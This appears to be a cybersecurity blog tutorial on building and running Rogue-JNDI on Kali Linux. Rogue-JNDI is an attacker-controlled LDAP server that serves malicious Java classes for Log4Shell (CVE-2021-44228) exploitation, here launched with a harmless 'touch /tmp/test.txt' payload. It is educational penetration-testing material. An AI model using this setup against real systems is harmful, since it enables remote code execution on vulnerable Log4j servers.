How To Install Rogue-Jndi On Kali Linux

Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged LDAP request from the server running a vulnerable version of Log4j. There are quiet a few solutions out there that provide this functionality and one of them is Rogue-jndi. Rogue-jndi is a malicious LDAP server for JNDI injection attacks. In the next section I will give a short demonstration of how to install rogue-jndi on the latest version of Kali Linux. along with the required dependencies.

To build rogue-jndi, Java v1.7+ and Maven v3+ are required on the system. Java is already installed by default so we only have to install Maven. Maven can be installed with the following commands:

sudo apt-get update
sudo apt-get install maven

Press y to install Maven.

The next step is to clone the rogue-jndi repository. We will do this at the Desktop of the Kali user and change directory to the cloned folder with the following commands:

cd Desktop
git clone
cd rogue-jndi

Clone the rogue-jndi repository.

Inside the rogue-jndi folder we have to run the following command to build the rogue-jndi project which will take a minute or two to complete:

mvn package

The build process for rogue-jndi is started with the mvn package command.

The following output indicates that the build process completed successfully:

Build process completed successfully.

We can also see that the ‘target’ folder was created on our system that contains the jar file that can be executed with Java:

RogueJndi-1.1.jar was created on our system.

We can run rogue-jndi and output the usage instructions with the following command:

java -jar target/RogueJndi-1.1.jar -h

Rogue-jndi usage instructions

At this point we can start the vulnerable LDAP server with the required parameters, such as a command that will be served as Java class in response to an LDAP query. The following command starts the LDAP server and provides a Java class that creates a text file on the system as used in Log4Shell VMware vCenter Server (CVE-2021-44228):

java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test.txt" --hostname ""

The malicious LDAP server is running.

From here we can exploit vulnerable Log4j applications with payloads that connect to our malicious LDAP server. More detailed information on how to do this can be found in the following post:

Log4Shell VMware vCenter Server (CVE-2021-44228)

Recent Posts

See All

This article will be beginner friendly, only this time in the Linux console. The material is presented, in my experience, from the most frequently used to the rarest. As in the previous article about

In this PowerShell tutorial I will provide you with practice-oriented knowledge about PowerShell. Would you like to do your IT tasks better and more efficiently and would you like to use PowerShell fo


Hi, thanks for stopping by!

HI!! Our main goal for this website and our channel is to teach and educate everyone on cybersecurity for free. I will upload all my new tutorials and new courses on my blog and on my Youtube Channel. 

Join us in the general discussions to get answers to your queries from the community.
​Sign up here and subscribe to my Youtube channel to stay updated.

Let the posts
come to you.

Thanks for submitting!

  • YouTube